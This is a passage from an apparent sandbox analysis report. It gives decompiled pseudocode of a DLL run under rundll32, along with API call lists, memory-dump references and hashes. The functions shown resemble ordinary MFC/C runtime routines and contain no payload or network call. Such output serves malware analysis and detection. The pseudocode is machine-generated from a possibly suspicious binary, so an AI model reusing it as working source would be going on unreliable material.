                                                                                                        					if(_t96 == _t163) {
                                                                                                        						L19:
                                                                                                        						 *(_t177 - 0x34) = _t163;
                                                                                                        						 *(_t177 - 0x30) = _t163;
                                                                                                        					} else {
                                                                                                        						_t110 =  *((intOrPtr*)( *_t96 + 0x24))(_t96,  *((intOrPtr*)(_t177 + 0x10)), 0xffffffff, _t163, _t177 - 0x34);
                                                                                                        						__eflags = _t110;
                                                                                                        						if(_t110 != 0) {
                                                                                                        							goto L19;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					 *(_t177 - 0x34) =  *_t95;
                                                                                                        					 *(_t177 - 0x30) = _t95[1];
                                                                                                        				}
                                                                                                        				_push(_t177 - 0x38);
                                                                                                        				_push( *((intOrPtr*)(_t177 + 0x10)));
                                                                                                        				_push(_t137);
                                                                                                        				if( *((intOrPtr*)( *_t137 + 0x58))() != 0) {
                                                                                                        					 *(_t177 - 0x38) = _t163;
                                                                                                        				}
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_t99 = E1000AEEB();
                                                                                                        				_t171 = __imp__CoTaskMemFree;
                                                                                                        				_t165 = _t99;
                                                                                                        				 *_t171( *(_t177 - 0x28),  *((intOrPtr*)(_t177 + 0x10)),  *(_t177 - 0x34),  *(_t177 - 0x30),  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t177 + 0x18)),  *(_t177 - 0x38),  *(_t177 - 0x28),  *((intOrPtr*)(_t177 - 0x2c)));
                                                                                                        				if( *((intOrPtr*)(_t177 - 0x24)) != 0) {
                                                                                                        					 *_t171( *((intOrPtr*)(_t177 - 0x2c)));
                                                                                                        				}
                                                                                                        				E1002ACA5(_t177 - 0x44);
                                                                                                        				E1002ACA5(_t177 - 0x48);
                                                                                                        				E1002ACA5(_t177 - 0x4c);
                                                                                                        				return E1003EF35(_t137, _t165, _t171);
                                                                                                        			}

























                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 1000B931
                                                                                                        • lstrlenW.KERNEL32(?,0000F094,00000000,?,10061BE0), ref: 1000B9D9
                                                                                                        • CoTaskMemFree.OLE32(?,?,10061BE0), ref: 1000BA47
                                                                                                          • Part of subcall function 1003F256: __getptd_noexit.LIBCMT ref: 1003F256
                                                                                                        • CreateBindCtx.OLE32(00000000,?), ref: 1000BA8D
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 1000BB2D
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 1000BB38
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeTask$BindCreateH_prolog3___getptd_noexitlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 473291332-0
                                                                                                        • Opcode ID: e3cca7ad2acf628dbfc3ad23d0df768f674a2aec5e6a7a00b090678edb58c946
                                                                                                        • Instruction ID: feeb13e85b8e5de12b5c474336f826b4b97c54b0b778c90d16d1a77109a03906
                                                                                                        • Opcode Fuzzy Hash: e3cca7ad2acf628dbfc3ad23d0df768f674a2aec5e6a7a00b090678edb58c946
                                                                                                        • Instruction Fuzzy Hash: 6E713275D00619EFDF01DFA4C8858EEBBBAFF8A350B244149F501BB265DB31AA41CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 80%
                                                                                                        			E10026ADC(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v284;
                                                                                                        				char _v288;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t9;
                                                                                                        				intOrPtr* _t18;
                                                                                                        				void* _t26;
                                                                                                        				void* _t27;
                                                                                                        				void* _t33;
                                                                                                        				signed int _t34;
                                                                                                        				void* _t35;
                                                                                                        				signed int _t36;
                                                                                                        				void* _t37;
                                                                                                        
                                                                                                        				_t33 = __edi;
                                                                                                        				_t32 = __edx;
                                                                                                        				_t26 = __ebx;
                                                                                                        				_t9 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t9 ^ _t36;
                                                                                                        				_t39 = _a4 - 0x800;
                                                                                                        				_t35 = __ecx;
                                                                                                        				if(_a4 != 0x800) {
                                                                                                        					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						goto L2;
                                                                                                        					} else {
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					E10001000(__ebx, __edi, _t35, E1003FCB4(__edx,  &_v288, 4, "LOC"));
                                                                                                        					_t37 = _t37 + 0x10;
                                                                                                        					L2:
                                                                                                        					_push(_t26);
                                                                                                        					_push(_t33);
                                                                                                        					_t34 =  *(E1003F256(_t39));
                                                                                                        					 *(E1003F256(_t39)) =  *_t14 & 0x00000000;
                                                                                                        					_t35 = 0x112;
                                                                                                        					_t27 = E1003F3EF( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                        					_t18 = E1003F256(_t39);
                                                                                                        					_t40 =  *_t18;
                                                                                                        					if( *_t18 == 0) {
                                                                                                        						 *(E1003F256(__eflags)) = _t34;
                                                                                                        					} else {
                                                                                                        						E1000B122( *((intOrPtr*)(E1003F256(_t40))));
                                                                                                        					}
                                                                                                        					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                        						_t12 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					} else {
                                                                                                        						_t12 = LoadLibraryA( &_v284);
                                                                                                        					}
                                                                                                        					_pop(_t33);
                                                                                                        					_pop(_t26);
                                                                                                        				}
                                                                                                        				return E10039F21(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                        			}


















                                                                                                        APIs
                                                                                                        • _strcpy_s.LIBCMT ref: 10026B09
                                                                                                          • Part of subcall function 1003F256: __getptd_noexit.LIBCMT ref: 1003F256
                                                                                                        • __snprintf_s.LIBCMT ref: 10026B42
                                                                                                          • Part of subcall function 1003F3EF: __vsnprintf_s_l.LIBCMT ref: 1003F404
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10026B6D
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 10026B90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                        • String ID: LOC
                                                                                                        • API String ID: 3864805678-519433814
                                                                                                        • Opcode ID: 41e70f5e17d831a35654395bcd47d3dc8ca47c00ca9706084b8a50ae0e7bbd08
                                                                                                        • Instruction ID: 2309c2de20968928c53affd92b9fb6a1ba26f59a6acc7024cc465e5c4a1caa6c
                                                                                                        • Opcode Fuzzy Hash: 41e70f5e17d831a35654395bcd47d3dc8ca47c00ca9706084b8a50ae0e7bbd08
                                                                                                        • Instruction Fuzzy Hash: 2E11E975900218AFDB13EB60DC46BEE77ACDF0A351F4004A5F648EB091DB74AE858A95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E10039F21(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				void* _v804;
                                                                                                        				intOrPtr _v808;
                                                                                                        				intOrPtr _v812;
                                                                                                        				intOrPtr _t6;
                                                                                                        				intOrPtr _t11;
                                                                                                        				intOrPtr _t12;
                                                                                                        				intOrPtr _t13;
                                                                                                        				long _t17;
                                                                                                        				intOrPtr _t21;
                                                                                                        				intOrPtr _t22;
                                                                                                        				intOrPtr _t25;
                                                                                                        				intOrPtr _t26;
                                                                                                        				intOrPtr _t27;
                                                                                                        				intOrPtr* _t31;
                                                                                                        				void* _t34;
                                                                                                        
                                                                                                        				_t27 = __esi;
                                                                                                        				_t26 = __edi;
                                                                                                        				_t25 = __edx;
                                                                                                        				_t22 = __ecx;
                                                                                                        				_t21 = __ebx;
                                                                                                        				_t6 = __eax;
                                                                                                        				_t34 = _t22 -  *0x10072650; // 0xb5e27fef
                                                                                                        				if(_t34 == 0) {
                                                                                                        					asm("repe ret");
                                                                                                        				}
                                                                                                        				 *0x10099390 = _t6;
                                                                                                        				 *0x1009938c = _t22;
                                                                                                        				 *0x10099388 = _t25;
                                                                                                        				 *0x10099384 = _t21;
                                                                                                        				 *0x10099380 = _t27;
                                                                                                        				 *0x1009937c = _t26;
                                                                                                        				 *0x100993a8 = ss;
                                                                                                        				 *0x1009939c = cs;
                                                                                                        				 *0x10099378 = ds;
                                                                                                        				 *0x10099374 = es;
                                                                                                        				 *0x10099370 = fs;
                                                                                                        				 *0x1009936c = gs;
                                                                                                        				asm("pushfd");
                                                                                                        				_pop( *0x100993a0);
                                                                                                        				 *0x10099394 =  *_t31;
                                                                                                        				 *0x10099398 = _v0;
                                                                                                        				 *0x100993a4 =  &_a4;
                                                                                                        				 *0x100992e0 = 0x10001;
                                                                                                        				_t11 =  *0x10099398; // 0x0
                                                                                                        				 *0x10099294 = _t11;
                                                                                                        				 *0x10099288 = 0xc0000409;
                                                                                                        				 *0x1009928c = 1;
                                                                                                        				_t12 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v812 = _t12;
                                                                                                        				_t13 =  *0x10072654; // 0x4a1d8010
                                                                                                        				_v808 = _t13;
                                                                                                        				 *0x100992d8 = IsDebuggerPresent();
                                                                                                        				_push(1);
                                                                                                        				E1004B88D(_t14);
                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                        				_t17 = UnhandledExceptionFilter(0x1005fbcc);
                                                                                                        				if( *0x100992d8 == 0) {
                                                                                                        					_push(1);
                                                                                                        					E1004B88D(_t17);
                                                                                                        				}
                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 10040632
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10040647
                                                                                                        • UnhandledExceptionFilter.KERNEL32(1005FBCC), ref: 10040652
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 1004066E
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 10040675
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        • Opcode ID: 63f44c50f42e153a5708249d6d5a307e39c46eb98c64dd299f3aed359b190d5e
                                                                                                        • Instruction ID: 0f708c82d41b9f52fd32eb2f2d19f5a72d3e9f2e2ae1f9816dd2f8878cb93bd3
                                                                                                        • Opcode Fuzzy Hash: 63f44c50f42e153a5708249d6d5a307e39c46eb98c64dd299f3aed359b190d5e
                                                                                                        • Instruction Fuzzy Hash: 5E2180B4401226EFF748DF69CDC96843BA4FB48701F50811BF90D972A0E7B55A85CF45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E1002592C(intOrPtr __ebx, signed int __edx) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t46;
                                                                                                        				intOrPtr _t49;
                                                                                                        				signed int _t51;
                                                                                                        				void* _t53;
                                                                                                        				signed int* _t76;
                                                                                                        				signed int* _t79;
                                                                                                        				signed int* _t82;
                                                                                                        				signed int* _t85;
                                                                                                        				signed int _t96;
                                                                                                        				CHAR* _t98;
                                                                                                        				intOrPtr _t99;
                                                                                                        				signed int* _t102;
                                                                                                        				intOrPtr _t103;
                                                                                                        				signed int _t104;
                                                                                                        				void* _t106;
                                                                                                        
                                                                                                        				_t96 = __edx;
                                                                                                        				_t84 = __ebx;
                                                                                                        				_t104 = _t106 - 0xcc;
                                                                                                        				_t46 =  *0x10072650; // 0xb5e27fef
                                                                                                        				 *(_t104 + 0xc8) = _t46 ^ _t104;
                                                                                                        				_t102 =  *(_t104 + 0xd8);
                                                                                                        				_t98 =  *(_t104 + 0xd4);
                                                                                                        				if(_t98 != 0) {
                                                                                                        					if(lstrlenA(_t98) >= 0x104) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						_push(__ebx);
                                                                                                        						_t85 =  &(_t102[8]);
                                                                                                        						_t51 = E1002F560(_t85, _t98);
                                                                                                        						if(_t51 != 0) {
                                                                                                        							_t53 = FindFirstFileA(_t98, _t104 - 0x78);
                                                                                                        							_t100 = _t98 | 0xffffffff;
                                                                                                        							if(_t53 != (_t98 | 0xffffffff)) {
                                                                                                        								FindClose(_t53);
                                                                                                        								_t102[8] =  *(_t104 - 0x78) & 0x0000007f;
                                                                                                        								asm("cdq");
                                                                                                        								_t102[6] =  *(_t104 - 0x58);
                                                                                                        								_t102[7] = _t96;
                                                                                                        								if(E100256CA(_t104 - 0x74) == 0) {
                                                                                                        									 *_t102 =  *_t102 & 0x00000000;
                                                                                                        									_t102[1] = _t102[1] & 0x00000000;
                                                                                                        								} else {
                                                                                                        									_t82 = E100257E4(_t85, _t104 - 0x80, _t100, _t104 - 0x74, _t100);
                                                                                                        									 *_t102 =  *_t82;
                                                                                                        									_t102[1] = _t82[1];
                                                                                                        								}
                                                                                                        								if(E100256CA(_t104 - 0x6c) == 0) {
                                                                                                        									_t102[4] = 0;
                                                                                                        									_t102[5] = 0;
                                                                                                        								} else {
                                                                                                        									_t79 = E100257E4(_t85, _t104 - 0x80, _t100, _t104 - 0x6c, _t100);
                                                                                                        									_t102[4] =  *_t79;
                                                                                                        									_t102[5] = _t79[1];
                                                                                                        								}
                                                                                                        								if(E100256CA(_t104 - 0x64) == 0) {
                                                                                                        									_t102[2] = 0;
                                                                                                        									_t102[3] = 0;
                                                                                                        								} else {
                                                                                                        									_t76 = E100257E4(_t85, _t104 - 0x80, _t100, _t104 - 0x64, _t100);
                                                                                                        									_t102[2] =  *_t76;
                                                                                                        									_t102[3] = _t76[1];
                                                                                                        								}
                                                                                                        								if(( *_t102 | _t102[1]) == 0) {
                                                                                                        									 *_t102 = _t102[2];
                                                                                                        									_t102[1] = _t102[3];
                                                                                                        								}
                                                                                                        								if((_t102[4] | _t102[5]) == 0) {
                                                                                                        									_t102[4] = _t102[2];
                                                                                                        									_t102[5] = _t102[3];
                                                                                                        								}
                                                                                                        								_t49 = 1;
                                                                                                        							} else {
                                                                                                        								goto L6;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							 *_t85 = _t51;
                                                                                                        							L6:
                                                                                                        							_t49 = 0;
                                                                                                        						}
                                                                                                        						_pop(_t84);
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					_t49 = 0;
                                                                                                        				}
                                                                                                        				_pop(_t99);
                                                                                                        				_pop(_t103);
                                                                                                        				return E10039F21(_t49, _t84,  *(_t104 + 0xc8) ^ _t104, _t96, _t99, _t103);
                                                                                                        			}





















                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,-00000001), ref: 10025961
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1659193697-0
                                                                                                        • Opcode ID: 4816466610db15041bf4befe32784a95d468d38e88b602cc21c3e10d9757e4ee
                                                                                                        • Instruction ID: 4d95fcf8730b3881445e5824ed999bb7e88cf789480e7c8658fc30675fc16f96
                                                                                                        • Opcode Fuzzy Hash: 4816466610db15041bf4befe32784a95d468d38e88b602cc21c3e10d9757e4ee
                                                                                                        • Instruction Fuzzy Hash: 79414876900705DFD720DF68E88199AB7F8FF08311B508A2EE89BD7611E731E944CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E10022F30(void* __ebx, void* __ecx, void* __esi, void* __ebp, int _a4, intOrPtr _a8) {
                                                                                                        				void* __edi;
                                                                                                        				void* _t9;
                                                                                                        				int _t12;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				int _t19;
                                                                                                        				void* _t20;
                                                                                                        				void* _t23;
                                                                                                        
                                                                                                        				_t23 = __ebp;
                                                                                                        				_t20 = __esi;
                                                                                                        				_t17 = __ecx;
                                                                                                        				_t14 = __ebx;
                                                                                                        				_t19 = _a4;
                                                                                                        				_t24 = _t19;
                                                                                                        				if(_t19 == 0) {
                                                                                                        					E1000836F(__ebx, __ecx, _t19, __esi, _t24);
                                                                                                        				}
                                                                                                        				_push(_t14);
                                                                                                        				_push(_t20);
                                                                                                        				_t15 = E1000E5E5(_t14, _t17, _t23, GetParent( *(_t19 + 0x20)));
                                                                                                        				_t18 = _t15;
                                                                                                        				if(E1002566C(_t15, 0x1005c558) == 0) {
                                                                                                        					L9:
                                                                                                        					_t9 = 0;
                                                                                                        				} else {
                                                                                                        					if(_a8 == 0) {
                                                                                                        						while(1) {
                                                                                                        							_t19 = E1000E5E5(_t15, _t18, _t23, GetParent( *(_t19 + 0x20)));
                                                                                                        							__eflags = _t19;
                                                                                                        							if(_t19 == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t12 = IsIconic( *(_t19 + 0x20));
                                                                                                        							__eflags = _t12;
                                                                                                        							if(_t12 != 0) {
                                                                                                        								goto L9;
                                                                                                        							} else {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        						goto L4;
                                                                                                        					} else {
                                                                                                        						L4:
                                                                                                        						_t9 = _t15;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L5:
                                                                                                        				return _t9;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 10022F49
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • IsIconic.USER32 ref: 10022F75
                                                                                                        • GetParent.USER32(?), ref: 10022F82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Parent$Exception@8H_prolog3IconicThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 144390861-0
                                                                                                        • Opcode ID: d210d7f1a51b40b5cc29df3b79207927f6febed5ce85f2330f2acac0138b4f8d
                                                                                                        • Instruction ID: 2fb89b87b9060bf2a3fa0836399fa3e5e22fc1271db9f66f0674af366c504e6e
                                                                                                        • Opcode Fuzzy Hash: d210d7f1a51b40b5cc29df3b79207927f6febed5ce85f2330f2acac0138b4f8d
                                                                                                        • Instruction Fuzzy Hash: 5CF0B435204A127BE791DAB4ED44A1BAAB9FF902E5B810535F884A3124FF30ED50C751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E1000BD3C(struct HWND__* _a4, signed int _a8) {
                                                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                                                        				int _t16;
                                                                                                        
                                                                                                        				if(E1000BBFB() == 0) {
                                                                                                        					if((_a8 & 0x00000003) == 0) {
                                                                                                        						if(IsIconic(_a4) == 0) {
                                                                                                        							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                                                        						} else {
                                                                                                        							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                                                        						}
                                                                                                        						if(_t16 == 0) {
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							return E1000BCF0( &(_v48.rcNormalPosition), _a8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return 0x12340042;
                                                                                                        				}
                                                                                                        				return  *0x10098d14(_a4, _a8);
                                                                                                        			}






                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • Opcode ID: 74ad9e125bbab192a0475b4a339846f2d1bd3bbf5fb3d64e2e1c5f75bf2aa371
                                                                                                        • Instruction ID: e5f65d51c15a6ed25578a50b7076b6e8eaf12e5ef2ee155e80ac9edb6982d403
                                                                                                        • Opcode Fuzzy Hash: 74ad9e125bbab192a0475b4a339846f2d1bd3bbf5fb3d64e2e1c5f75bf2aa371
                                                                                                        • Instruction Fuzzy Hash: 4FF03735600919ABFF91DF61CC48AAEBBBAFF002D0B108022FC05A5068EB30DB519B52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E100104FC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				unsigned int _t147;
                                                                                                        				signed int _t149;
                                                                                                        				signed int* _t152;
                                                                                                        				intOrPtr _t159;
                                                                                                        				intOrPtr* _t160;
                                                                                                        				unsigned int _t163;
                                                                                                        				unsigned int _t166;
                                                                                                        				signed int* _t170;
                                                                                                        				signed int* _t173;
                                                                                                        				unsigned int _t177;
                                                                                                        				unsigned int _t181;
                                                                                                        				unsigned int _t185;
                                                                                                        				signed int _t189;
                                                                                                        				signed int* _t194;
                                                                                                        				signed int _t195;
                                                                                                        				unsigned int _t196;
                                                                                                        				intOrPtr* _t197;
                                                                                                        				unsigned int _t198;
                                                                                                        				signed int _t213;
                                                                                                        				signed int _t217;
                                                                                                        				unsigned int _t224;
                                                                                                        				void* _t225;
                                                                                                        
                                                                                                        				_t200 = __ecx;
                                                                                                        				_push(0x70);
                                                                                                        				E1003EE82(0x100538b8, __ebx, __edi, __esi);
                                                                                                        				_t222 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t225 - 0x10)) = 0;
                                                                                                        				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
                                                                                                        				_t189 =  *(_t225 + 8);
                                                                                                        				 *(_t225 - 4) = 0;
                                                                                                        				if(_t189 != 0x111) {
                                                                                                        					__eflags = _t189 - 0x4e;
                                                                                                        					if(_t189 != 0x4e) {
                                                                                                        						__eflags = _t189 - 6;
                                                                                                        						_t224 =  *(_t225 + 0x10);
                                                                                                        						if(_t189 == 6) {
                                                                                                        							E1000FECB(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000E5E5(_t189, __ecx, _t225, _t224));
                                                                                                        						}
                                                                                                        						__eflags = _t189 - 0x20;
                                                                                                        						if(_t189 != 0x20) {
                                                                                                        							L12:
                                                                                                        							_t147 =  *(_t222 + 0x4c);
                                                                                                        							__eflags = _t147;
                                                                                                        							if(_t147 == 0) {
                                                                                                        								L20:
                                                                                                        								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
                                                                                                        								 *(_t225 + 0x10) = _t149;
                                                                                                        								E1000D051(_t225 - 0x14, _t222, 7);
                                                                                                        								_t194 = 0x10097510 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
                                                                                                        								__eflags =  *(_t225 + 8) -  *_t194;
                                                                                                        								 *(_t225 - 0x18) = _t194;
                                                                                                        								if( *(_t225 + 8) !=  *_t194) {
                                                                                                        									L25:
                                                                                                        									_t152 =  *(_t225 - 0x18);
                                                                                                        									_t195 =  *(_t225 + 0x10);
                                                                                                        									 *_t152 =  *(_t225 + 8);
                                                                                                        									_t152[2] = _t195;
                                                                                                        									while(1) {
                                                                                                        										__eflags =  *_t195;
                                                                                                        										if( *_t195 == 0) {
                                                                                                        											break;
                                                                                                        										}
                                                                                                        										__eflags =  *(_t225 + 8) - 0xc000;
                                                                                                        										_push(0);
                                                                                                        										_push(0);
                                                                                                        										if( *(_t225 + 8) >= 0xc000) {
                                                                                                        											_push(0xc000);
                                                                                                        											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
                                                                                                        											while(1) {
                                                                                                        												_t196 = E1000C64E();
                                                                                                        												__eflags = _t196;
                                                                                                        												if(_t196 == 0) {
                                                                                                        													break;
                                                                                                        												}
                                                                                                        												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
                                                                                                        												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
                                                                                                        													( *(_t225 - 0x18))[1] = _t196;
                                                                                                        													E1000D080(_t225 - 0x14);
                                                                                                        													L102:
                                                                                                        													_t197 =  *((intOrPtr*)(_t196 + 0x14));
                                                                                                        													L103:
                                                                                                        													_push(_t224);
                                                                                                        													_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                        													L104:
                                                                                                        													_t159 =  *_t197();
                                                                                                        													L105:
                                                                                                        													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
                                                                                                        													goto L106;
                                                                                                        												}
                                                                                                        												_push(0);
                                                                                                        												_push(0);
                                                                                                        												_push(0xc000);
                                                                                                        												_t198 = _t196 + 0x18;
                                                                                                        												__eflags = _t198;
                                                                                                        												_push(_t198);
                                                                                                        											}
                                                                                                        											_t195 =  *(_t225 + 0x10);
                                                                                                        											L36:
                                                                                                        											_t195 =  *_t195();
